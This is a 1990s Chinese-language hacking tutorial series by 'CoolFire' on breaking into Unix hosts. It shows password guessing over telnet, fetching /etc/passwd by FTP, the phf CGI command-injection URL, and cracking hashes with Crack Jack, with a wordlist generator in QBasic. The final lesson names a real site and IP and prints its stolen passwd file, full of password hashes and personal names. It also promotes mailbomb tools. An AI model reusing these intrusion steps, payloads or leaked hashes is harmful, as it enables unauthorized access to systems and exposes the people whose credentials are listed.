| How 1. 進(jìn)入主機有好幾種方式, 可以經(jīng)由 Telnet (Port 23) 或 SendMail (Port 25) 或 FTP 或 WWW (Port 80) 的方式進(jìn)入, 一臺主機雖然只有一個(gè)位址, 但是它可能 同時(shí)進(jìn)行多項服務(wù), 所以如果你只是要 "進(jìn)入" 該主機, 這些 Port 都是很好的進(jìn) 行方向. 當然還有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麼??? 我不知 道, 你知道嗎?! 底下的示范并不是像寫(xiě)出來(lái)的那麼容易, 只不過(guò)是要讓你了解如何進(jìn)入, 當然其 中還有很多問(wèn)題, 如打錯指令...... 等等的毛病... 沒(méi)有出現在課堂上, 但是我為了 面子.... 一定要刪掉這些不堪入目的東西嘛... 示范進(jìn)入主機的方法: (By CoolFire) (首先要先連上某一臺你已經(jīng)有賬號的 Telnet 主機, 當然最好是假的, 也就是 Crack 過(guò)的主機, 然後利用它來(lái) Crack 別的主機, 才不會(huì )被別人以逆流法查出你的所在) Digital UNIX (ms.hinet.net) (ttypa) login: FakeName Password: Last login: Mon Dec 2 03:24:00 from 255.255.0.0 (我用的是 ms.hinet.net ... 當然是假的羅, 都已經(jīng)經(jīng)過(guò)修改了啦 !! 沒(méi)有這一臺主機啦 !! 別怕 ! 別怕 ! 以下的主機名稱(chēng)都是假的名 稱(chēng), 請同學(xué)們要記得 !!) Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996 Digital UNIX V1.2C Worksystem Software (Rev. 248) Digital UNIX Chinese Support V1.2C (rev. 3) (嗯... 進(jìn)來(lái)了 ! 開(kāi)始攻擊吧 ! 本次的目標是......) ms.hinet.net> telnet www.fuckyou.hinet.net (Telnet 試試看....) Trying 111.222.255.255... Connected to cool.fuckyou.hinet.net. Escape character is ‘^]‘. Password: Login incorrect (沒(méi)關(guān)系, 再來(lái) !!) cool login: hinet Password: Login incorrect cool login: (都沒(méi)猜對, 這邊用的是 猜 的方法, 今天運氣好像不好) telnet> close Connection closed. (重來(lái), 換個(gè) Port 試試看 !!) ms.hinet.net> telnet 111.222.255.255 80 Trying 111.222.255.255... Connected to 111.222.255.255. Escape character is ‘^]‘. <HTML> <HEAD> <TITLE>Error</TITLE> </HEAD> <BODY> <H1>Error 400</H1> Invalid request "" (unknown method) <P><HR><ADDRESS><A >CERN-HTTPD 3.0A</A></ADDRESS> </BODY> </HTML> Connection closed by foreign host. (哇哩 !! 連密碼都沒(méi)得輸入, 真是..... 再來(lái) !! 要有恒心 !!) (換 FTP Port 試試) ms.hinet.net> ftp 111.222.255.255 Connected to 111.222.255.255. 220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. Name (111.222.255.255:FakeName): anonymous 331 Guest login ok, send your complete e-mail address as password. Password: 230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to root@cool.com 230-If you do have problems, please try using a dash (-) as the first character 230-of your password -- this will turn off the continuation messages that may 230-be confusing your ftp client. 230- 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. (哇 ! 可以用 anonymous 進(jìn)來(lái)耶!! password 部份輸入 aaa@ 就好了 ! 不要留下足跡喔!!) ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for file list. etc pub usr bin lib incoming welcome.msg 226 Transfer complete. (嗯嗯... 太好了 ! 進(jìn)來(lái)了 !! 下一個(gè)目標是.....) ftp> cd etc 250 CWD command successful. ftp> get passwd (抓回來(lái) !!) 200 PORT command successful. 150 Opening BINARY mode data connection for passwd (566 bytes). 226 Transfer complete. 566 bytes received in 0.56 seconds (0.93 Kbytes/s) (喔... 這麼容易嗎??) ftp> !cat passwd (看看 !!!) root::0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbin:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/var/spool/news: uucp:*:10:14:uucp:/var/spool/uucp: operator:*:11:0:operator:/root:/bin/bash games:*:12:100:games:/usr/games: man:*:13:15:man:/usr/man: postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash ftp:*:404:1::/home/ftp:/bin/bash (哇哩... 是 Shadow 的... 真是出師不利.... ) ftp> bye 221 Goodbye. (不信邪.... 還是老話(huà), 要有恒心....) (FTP 不行, 再 Telnet 看看 !!) ms.hinet.net> telnet www.fuckyou.hinet.net Trying 111.222.255.255... Connected to cool.fuckyou.hinet.net. Escape character is ‘^]‘. Password: Login incorrect (又猜錯 !!) cool login: fuckyou Password: Last login: Mon Dec 2 09:20:07 from 205.11.122.12 Linux 1.2.13. Some programming languages manage to absorb change but withstand progress. cool:~$ (哇哈哈 !! 哪個(gè)笨 root, 用 system name 作 username 連 password 也是 system name.... 總算... 沒(méi)白玩...) cool:~$ system bash: system: command not found (嗯... 這個(gè) user 的權限好像不大....) cool:~$ ls cool:~$ pwd /home/fuckyou cool:~$ cd / cool:/$ ls Public/ cdrom/ lib/ mnt/ tmp/ www/ README dev/ linux* proc/ usr/ bin/ etc/ local/ root/ var/ boot/ home/ lost+found/ sbin/ cool:/$ cd etc telnet> quit (好想睡呀 !! 不玩了 !! 下節課再開(kāi)始....) Connection closed. ms.hinet.net> exit (走了 !! 下節課在見(jiàn)啦 !! 今天就上到這里 ! 老師要先下班了 !!) (有學(xué)生說(shuō): 騙人! 還沒(méi)有破解呀!! 胡說(shuō) ! 不是已經(jīng)進(jìn)來(lái)了嗎 ??? 看看這節課上的是甚麼??? ---->進(jìn)入主機 !! 嗯.....) -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 2. 上節課抓回來(lái)一個(gè) "亂七八糟" 的 /etc/passwd, 你以為我的真那麼笨嗎?? guest 所 抓回來(lái)的能是甚麼好東西?? 所以這一節課繼續上次的攻擊行動(dòng). 上節課我們已 經(jīng) "猜" 到了一個(gè)不是 guest 的 username 及 password. 今天就以它來(lái)進(jìn)入主機瞧瞧 !! Digital UNIX (ms.hinet.net) (ttypa) login: FakeName Password: Last login: Mon Dec 2 03:24:00 from 255.255.0.0 Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996 Digital UNIX V1.2C Worksystem Software (Rev. 248) Digital UNIX Chinese Support V1.2C (rev. 3) (嗯... 進(jìn)來(lái)了 ! 開(kāi)始攻擊吧 ! 本次的目標是.....呵...) ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet 試試看.... 昨天的位址, 有作筆記吧!) stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net Trying 111.222.255.255... Connected to cool.fuckyou.hinet.net. Escape character is ‘^]‘. Password: Login incorrect cool login: fuckyou Password: (一樣輸入 fuckyou) Last login: Mon Dec 1 12:44:10 from ms.hinet.net Linux 1.2.13. cool:~$ cd /etc cool:/etc$ ls DIR_COLORS ftpusers localtime resolv.conf HOSTNAME gateways magic rpc NETWORKING group mail.rc securetty NNTP_INEWS_DOMAIN host.conf motd sendmail.cf X11@ hosts messages/ sendmail.st XF86Config hosts.allow mtab services at.deny hosts.deny mtools shells bootptab hosts.equiv named.boot shutdownp csh.cshrc hosts.lpd networks snoopy/ csh.login httpd.conf nntpserver slip.hosts exports inetd.conf passwd snooptab fastboot inittab passwd.OLD syslog.conf fdprm issue passwd.old syslog.pid fstab ld.so.cache printcap ttys ftpaccess ld.so.conf profile utmp@ (找尋目標..... 太亂了 ! 懶得找, 再來(lái) ....) cool:/etc$ ls pa* passwd passwd.OLD passwd.old (果然在) cool:/etc$ more passwd (看看有沒(méi)有 Shadow...) root:acqQkJ2LoYp:0:0:root:/root:/bin/bash john:234ab56:9999:13:John Smith:/home/john:/bin/john (正點(diǎn) ! 一點(diǎn)都沒(méi)有防備 !!) cool:/etc$ exit logout (走了!.... 換 FTP 上場(chǎng) !!) Connection closed by foreign host. ms.hinet.net> ftp www.fuckyou.hinet.net Connected to cool.fuckyou.hinet.net. 220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. Name (www.fuckyou.hinet.net:66126): fuckyou 331 Password required for fuckyou. Password: 230 User fuckyou logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /etc 250 CWD command successful. ftp> get passwd 200 PORT command successful. 150 Opening BINARY mode data connection for passwd (350 bytes). 226 Transfer complete. 350 bytes received in 0.68 seconds (1.9 Kbytes/s) ftp> !cat passwd root:acqQkJ2LoYp:0:0:root:/root:/bin/bash john:234ab56:9999:13:John Smith:/home/john:/bin/john (看看 ! 呵 ! 假不了 !!......) ftp> bye 221 Goodbye. ms.hinet.net> exit (閃人羅 !! 下課 !!.... 喔慢點(diǎn), 還有事要說(shuō)明......) passwd 的 Shadow 就是把 passwd 放在 shadow 檔中, 而你原先在第一節課 所看到的這個(gè)格式的 passwd 并不是真正的 passwd.... root::0:0:root:/root:/bin/bash 因為密碼的部份沒(méi)有東西.... 所以拿了也沒(méi)有用 !! 但這一節課所拿到的東西呢, 像是這樣, 有幾點(diǎn)需要說(shuō)明的, 就是它究竟代表著(zhù)甚麼??? john:234ab56:9999:13:John Smith:/home/john:/bin/sh 它以 ":" 分成幾個(gè)欄位, 各欄位對照如下: User Name: john Password:234ab56 User No: 9999 Group No: 13 Real Name: John Smith Home Dir: /home/john Shell: /bin/sh 了了吧 ! 了了吧 ! 保留著(zhù)你千辛萬(wàn)苦所拿到的 passwd, 咱們第三節 課再來(lái)告訴各位如何使用 Crack Jack 把 passwd 解碼.... 呵呵... zzZZzZzz... -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- Crack Jack V1.4 中文使用說(shuō)明 (By CoolFire 12-1-1996) 嗯... 該到第三課了 !! 累了的同學(xué)先去喝口水吧! 這一節課咱們來(lái)說(shuō)說(shuō) Crack Jack ! 這可是個(gè)解讀 /etc/passwd 的好工具喔, 不要告訴我你習慣用 Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包準你馬上投向 Crack Jack 1.4 的懷抱, 但請 先確定你所使用的是 Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page 中拿到這個(gè)版 本的 Crack Jack ! 這才是真正有用的版本, 速度... 對... 就是這點(diǎn)別人都比不上 ! 但還是要講 講它的缺點(diǎn)... 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上開(kāi)個(gè) DOS Mode 跑, 它可是連 理都不會(huì )理你的 ! OK! 現在切入正題 ! etc/passwd 拿到手了吧 !! 開(kāi)始羅 !! 使用 Crack Jack 1.4 前所需要的東 西有這些 [1] Crack Jack 1.4 (廢話(huà)...$%^&@@) [2] /etc/passwd 檔案, 你可以在 Unix 系統中 的 /etc/ 目錄中找到 passwd [3] 字典檔 (哪里找, 自己敲... 呵 ClayMore 中有一份 DIC.TXT 是有一千多個(gè)字的字典, 但比起我的字典可就小巫見(jiàn)大巫了, LetMeIn! 1.0 里面也有, 聽(tīng) James 說(shuō) 2.0 Release 的時(shí)候會(huì )有更棒的字典檔含入, 期待吧!).... 使用 Crack Jack 1.4 前需先確 定你所使用的機器是 386 含以上 CPU 的 ! 然後最好有充足的記憶體 !! 開(kāi)始 Jack 時(shí)只要敲入 JACK 即可, 它會(huì )問(wèn)你 PW Name... 輸入你的 passwd 檔名, Dictionary Name 輸入你的字典檔名, Jack 就會(huì )開(kāi)始找了 ! 找到時(shí)會(huì )告訴你, 也會(huì )在 JACK.POT 中寫(xiě)入它所 找到的密碼 !! 但... 有點(diǎn)怪的格式! 如果找到的是具 root 權限的密碼, Jack 會(huì )告訴你 This is JackAss... 嗯...說(shuō)臟話(huà)了 !! 因為使用 Jack 占用的時(shí)間實(shí)在太多, 如果你中途想要停掉時(shí)只要 按下 Ctrl-C 即可, 別以為你前功盡棄了! 因為 Jack 有個(gè) Restore 的功能, 中斷時(shí)會(huì )自動(dòng)存檔 為 RESTORE, 下次要繼續這次的尋找只要輸入 Jack -Restore:RESTORE 即可 !! 當然你也可以為 你的 Restore 重新命名 ! Jack 也會(huì )找得到的 ... 如 Ren restore restore.HNT 之後要再尋找 的時(shí)後就 Jack -Restore:RESTORE.HNT 即可... Jack 會(huì )很自動(dòng)的 Restore 前次所尋找的字串... 繼續幫你找下去.... 字典檔哪里找: 我的不給你! 可以找別的 Brute Force 之類(lèi)的程式, 有些里面會(huì )附, 或是找找其它 的 Hacker 地下站看看有沒(méi)有, 自己編一個(gè), 或找個(gè)英漢字典軟體將字典的部份解出來(lái), 可能要有 一點(diǎn)資料欄位及寫(xiě)程式的基礎. [這一節課沒(méi)有范例] 成功的案例: 找到過(guò)某家網(wǎng)路咖啡店的 root 權限密碼 ! Jack 好正點(diǎn)呀 !!! 所花的時(shí)間: 20 分鐘左右... 但也有找了一兩天也找不到的..... 嗚... 駭客們! 加油吧 !! 詳細內容: **談一下 Crack Jack 猜猜密碼 許多人從上一次介紹 Crack Jack 之後就應該已經(jīng)領(lǐng)教過(guò)它的功力了,但是有幾點(diǎn)需要說(shuō)明的,有些人使用 Jack 來(lái)幫你尋找 password, 我就當你已經(jīng)抓到了沒(méi)有 shadow 的/etc/passwd, 但是為甚麼使用 Jack 還是找不到呢?? 我想你應該要換個(gè)正點(diǎn)一點(diǎn)的字典檔了, 因為Jack 還是根據你所提供的字典檔在尋找, 如果你提供的字典本身就沒(méi)有這些字,那當然連一個(gè)小小賬號的密碼你都別想猜到了. 數一下你所使用的字典檔中有多少字 ???我用的字典檔有十九萬(wàn)多個(gè)字, 你的呢? 是不是小巫見(jiàn)大巫呀 ?? 那麼就趕快充實(shí)一下字典檔再重新尋找吧 !! 許多人的密碼都有一定的法則, 我自己寫(xiě)了 PaSs2DiC 就是將 UserName 由 passwd檔轉成字典檔的工具, 這是對一些喜歡使用 UserName 當作 Password 的人最好的方式,但是也曾經(jīng)好運的找到別人的密碼, 真不曉得"甲"是不是暗戀"乙"才用"乙"的 ID 作為密碼的 ???你可以很簡(jiǎn)單的使用Qbasic 來(lái)制作 "序數" 密碼, 或日期密碼, 底下簡(jiǎn)單的作一個(gè) 0101 (一月一日) 到1231 的密碼檔出來(lái): ------------Cut Here MakeDate.BAS ------------------- Open "Dates" for output as #1 for I=1 to 12 for J=1 to 31 I1$=rtrim$(ltrim$str$(I))) J1$=rtrim$(ltrim$str$(J))) if len(I1$)=1 then I1$="0"+I1$ if len(J1$)=1 then J1$="0"+J1$ Out$=I1$+J1$ print #1,Out$ next I next J close ------------ Cut Here End MakeDate.BAS ---------------- 這個(gè)小程式將會(huì )寫(xiě)一個(gè) "DATES" 的檔案, 里面就是你要的字典, 當然啦,這只是包含月跟日 !! 如果你要猜的密碼是含年份的,你可能要再增加一些程式碼, 再 Run 一次試試看了,不過(guò)這是一個(gè)好的開(kāi)始不是嗎 ?? **如何保護自己的密碼 談了這麼多的密碼猜法, 當然要談一下如何保護自己的密碼不被破解, 請遵守以下的原則: [1]不用生日作為密碼(太容易猜了啦) [2]不用序數作為密碼(除非你的序數無(wú)限大) [3]不用身份證字號作為密碼(LetMeIn! 里有猜身份證字號的功能耶) [4]不用在字典中查得到的字作為密碼. 那麼依照上面的幾點(diǎn)說(shuō)法, 甚麼樣子的密碼最不容易猜, 自己也最好記呢?? 答案是:用一句有意義的話(huà)來(lái)作為自己的密碼, 例如: NoOneCanCrackIt 就是一個(gè)很難猜的密碼類(lèi)型,基於這個(gè)密碼猜法的原則, 你的密碼是不是要作些更新, 或是大小寫(xiě)要作一些對調 ?? 如果你的密碼是coolfire,建議你最好能改成 CoolFire 或 coolfires (加復數 "s"),這樣被猜中的機率就小了很多. 如果你是一個(gè) Hacker, 你的密碼也被人猜中的話(huà)... 那...#%%^^^&@ **正式的話(huà)題 這次的話(huà)題當然還是 Crack, 相信許多人已經(jīng)看過(guò) CoolHC#1 了,當然眼尖的人可能也已經(jīng) D/LSystem Holes 試過(guò)了, 你有成功的例子嗎 ?? 如果沒(méi)有, 這份 CoolHC#2 可能就是你的強心針,因為這次談的正是 System Holes #1 成功的案例. Step 1. 連線(xiàn)到 "蕃薯藤" 找 "網(wǎng)路咖啡" 找到好多家網(wǎng)路咖啡的 WWW 網(wǎng)址, 一一連上去試試看 在 System Holes #1 中的方法可不可行. Step 2. 若可行則會(huì )傳回 /etc/passwd 資訊, 存檔後迅速 Logout, 使用 Crack Jack 解讀!! [[實(shí)例探討]] System Holes #1 中所介紹的 WWW 入侵法是這樣子的: http://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再 http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd [1] 用 WWW Browser 連到 yournet.net [2] Location 輸入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*" [3] 接著(zhù)如果出來(lái)一份像 Report 的畫(huà)面的話(huà), 接著(zhù)輸入 /cgi-bin/phf?Qalias=x%0aless%20/etc/passwd [4] 發(fā)生了甚麼事?? etc/passwd 在你的瀏覽器中 "顯示" 出來(lái)了 !! 快點(diǎn) Save 吧 !! 這個(gè)方法所用的是系統 "檢索" 的漏洞, 不提供這個(gè)功能, 或是伺服器檢索類(lèi)型不同的機器則不 會(huì )接受這樣的指令, 當然也就逃過(guò)我們這次的模擬演練啦 !! 但是.... 相信我, 你一定會(huì )找到一 家脫線(xiàn)的網(wǎng)路咖啡, 并沒(méi)有像我們一樣每天閱讀 Mail List 的信, 對系統安全一點(diǎn)研究也沒(méi)有的 人不在少數. http://hacker.welcome.com 就是這樣的一個(gè) Net Coffee Shop... 呵.... 快來(lái)試 試吧 !! 當 CoolFire 抓到 /etc/passwd 後, 立刻存檔, 也馬上斷線(xiàn), 并且拿出 UltraEdit 來(lái)瞧一下使用 者的資訊, 當然這個(gè)小 passwd 對 Crack Jack 來(lái)說(shuō), 實(shí)在是不夠看, 沒(méi)幾分鐘就在我的 486 機 器上顯示出來(lái)幾個(gè)以 UserName 作為 Password 的資訊 (歸功於 PaSs2DiC 及 CrackJack 的功勞) 不過(guò)當我試著(zhù)找尋 root 的密碼時(shí), 一想到我那將近 20 萬(wàn)字的字典檔, 就想到可能花費的時(shí)間一 定相當的驚人, 於是就以 Jack 的 Option 設定只尋找 root 那一行, ... (過(guò)了良久)... 果不然 又是一個(gè)笨 root. 用了 "非常" 容易猜的密碼... <--- This is JackAss... 呵!! Got It! 如果你所使用的機器速度不是頂快, 你最好能夠到快一點(diǎn)的機器上使用 Crack Jack, 不然你也可 以將字典檔切割成幾個(gè)小檔案, 然後再分別在幾臺機器上跑, 我目前使用的配備是 486DX4-130 32MB RAM, 3.2GB HDD, 近 20 萬(wàn)字的字典檔, 如果在分析較大的 passwd 檔時(shí)我會(huì )將字典檔切割 為四至五個(gè)小檔 (看有多少臺機器可跑), 然後在周末下班前在公司的幾臺機器上分別執行 Crack Jack, 等到禮拜一上班時(shí)就等著(zhù)接收成果了! 當然如果你只有一臺機器, passwd 檔又很大的話(huà), 由於 Crack Jack 無(wú)法於 Windoz 95 下使用, 你可能只能犧升時(shí)間或機器來(lái)跑了! 再沒(méi)有辦法的 話(huà), 亦可使用單機多工, 多開(kāi)幾個(gè) DOS Box 來(lái)跑 Brute, 也許也是一個(gè)可行的辦法! **後語(yǔ) 有許多人在使用 Crack Jack 的時(shí)候有許多問(wèn)題, 不過(guò)看了 CoolHC#1 應該都解決了吧 最近大 家問(wèn)的比較多的是 UpYours 3.0, 雖然已經(jīng)改進(jìn)了 Install 的問(wèn)題, 不過(guò)大家的問(wèn)題還是都出在 Winsck.ocx 上面, 有人說(shuō)裝了 MSICP Beta 會(huì )好 ?? 但也有實(shí)例裝了也還不能 Run 的, 在此建議 大家不要再玩 MailBomb 了, 雖然我喜歡收集這種東西, 但還是少亂炸為妙, 已經(jīng)證實(shí)有許多常用 的 MailBomb 沒(méi)有辦法 Fake IP 了 !! 所以... 如果 UpYours 3.0 裝不起來(lái)的人就試試 KaBoom! V3.0 吧 ! 雖然沒(méi)有辦法 Fake IP (選錯 Mail Server 的話(huà)), 但是也是一個(gè)不錯的 AnonyMailer 如果要發(fā)匿名信, 現在首頁(yè)上有可以幫你發(fā)信的 Mailer, 會(huì )安全一點(diǎn). 如果你仍舊對 UpYours 3.0 不死心, 就試試 ResSvr32.exe (Under Windows/system directory), 看看能不能將 WinSck.ocx 裝上了... 記得先 UnReg 再 Reg... 在此建議大家可以多訂閱一些 "系統安全" 討論的 Mail List或多參考一些已經(jīng)被找出來(lái)的系統漏洞, 因為有些人對這些方面并不是很重視, 所以這些資訊也就顯得格外的重要了, 如果能夠多參考一些資訊, 在你入侵的時(shí)候會(huì )有很大的幫助, 當然, 如果你能作出一份列表出來(lái),放在手邊參考的話(huà), 就可以快速的; 安全的入侵了!! 下一次所談的是 SendMail 的 Bug 實(shí)例,在這中間當然照往例會(huì )先出一份 System Holes #2 來(lái)作為資料. 如果有興趣的人在 SH#2出來(lái)的時(shí)候可以先研究看看. 下次見(jiàn)! Merry X‘Mas..... & Happy New Year....... 詳細內容: ISP 是一般 User 撥接的源頭, 技術(shù)上理應比較強, 但還是輕易讓人入侵, 且又沒(méi)有教導User 正確的網(wǎng)路使用觀(guān)念 (Password 的設定及 proxy 的使用等),實(shí)在不敢想像這樣的網(wǎng)路發(fā)展到幾年後會(huì )是甚麼樣子 ?? 這一次的說(shuō)明還是沒(méi)有談到新的技巧, 在 James將首頁(yè)更新後各位應該已經(jīng)可以從中學(xué)到許多東西了, 如果想要學(xué)習入侵, 就一定要知道最新的資訊 (入侵本國的網(wǎng)路則不用, 反正沒(méi)人重視網(wǎng)路安全..... 真失望), 在別人還沒(méi)將 Bug 修正之前就搶先一步拿到 /etc/passwd,所以訂閱一些網(wǎng)路安全的 Mail List 是必要的, 多看一些網(wǎng)安有關(guān)的 News Group 也是必要的 (不僅 Hacker如此, ISP 更要多注意這些資訊!). 日後有空再整里一些 Mail List 給大家 !! 本次主題: 說(shuō)明如何連接該 ISP 并且對其 /etc/passwd 解碼 連接位址: www.coffee.com.tw (203.66.169.11) 特別說(shuō)明: 由於本次主題說(shuō)明重點(diǎn)使用真實(shí)的位址及名稱(chēng), 所以 CoolFire 已經(jīng) Mail 給該網(wǎng)頁(yè)之維 護人員更改密碼, 但該網(wǎng)頁(yè)之 ISP 仍為新手之練習好題材! CoolFire Mail 給該網(wǎng)頁(yè)維護 人員之信件內容如下, 如果他還不盡快改掉, 我也沒(méi)辦法了! Mail sent to dhacme@tp.globalnet.com.tw: Subject: 請速更動(dòng)網(wǎng)頁(yè)密碼 From: CoolFire <coolfires@hotmail.com> 你的網(wǎng)頁(yè)作得不錯, 但是因為你所設定的密碼太容易為駭客所 入侵, 請於見(jiàn)到此信後速速更改你的網(wǎng)頁(yè)進(jìn)入密碼, 否則下次 若網(wǎng)頁(yè)遭到篡改, 本人概不負責!! **** 課程開(kāi)始 **** 請注意: 由於本次所作的課程內容以實(shí)作為主, 除了本人 IP 有所更改, 一切都使用本人所用之 Telnet 軟體 Log 檔收錄, 故若道德感不佳者請勿閱讀以下之詳細破解內容, 否則本人概不負責! (連線(xiàn)到某一主機之後.... 此處的 ms.hinet.net.tw 是假的 Domain name) ms.hinet.net.tw> telnet www.coffee.com.tw Trying 203.66.169.11... Connected to www.coffee.com.tw. Escape character is ‘^]‘. Password: (隨便按一下 Enter) Login incorrect www login: coffee (以 Hacker 的敏銳判斷 username=coffee password=coffee) Password: Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw 歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽(yù), 大家自己去看吧! ================================================================= (直接進(jìn)入核心部份) www:~$ cd /etc www:/etc$ ls DIR_COLORS hosts.equiv printcap HOSTNAME hosts.lpd profile NETWORKING inet@ protocols NNTP_INEWS_DOMAIN inetd.conf psdevtab X11@ inittab rc.d/ at.deny inittab.gettyps.sample resolv.conf bootptab ioctl.save rpc csh.cshrc issue securetty csh.login issue.net securetty.old default/ klogd.pid sendmail.cf diphosts ld.so.cache sendmail.st exports ld.so.conf services fastboot lilo/ shells fdprm lilo.conf shutdownpid fs/ localtime skel/ fstab magic slip.hosts ftp.banner mail.rc slip.login ftp.deny motd snooptab ftpaccess motd.bak sudoers ftpconversions msgs/ syslog.conf ftpgroups mtab syslog.pid ftpusers mtools termcap gateways named.boot ttys gettydefs networks utmp@ group nntpserver vga/ host.conf passwd wtmp@ hosts passwd.OLD yp.conf.example hosts.allow passwd.old hosts.deny ppp/ (看看我們的目標長(cháng)得如何???) www:/etc$ cat passwd root:abcdefghijklmn:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbin:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/usr/lib/news: uucp:*:10:14:uucp:/var/spool/uucppublic: operator:*:11:0:operator:/root:/bin/bash games:*:12:100:games:/usr/games: man:*:13:15:man:/usr/man: postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash nobody:*:-1:100:nobody:/dev/null: ftp:*:404:1::/home/ftp:/bin/bash guest:*:405:100:guest:/dev/null:/dev/null shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash lance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash sales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash lilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash 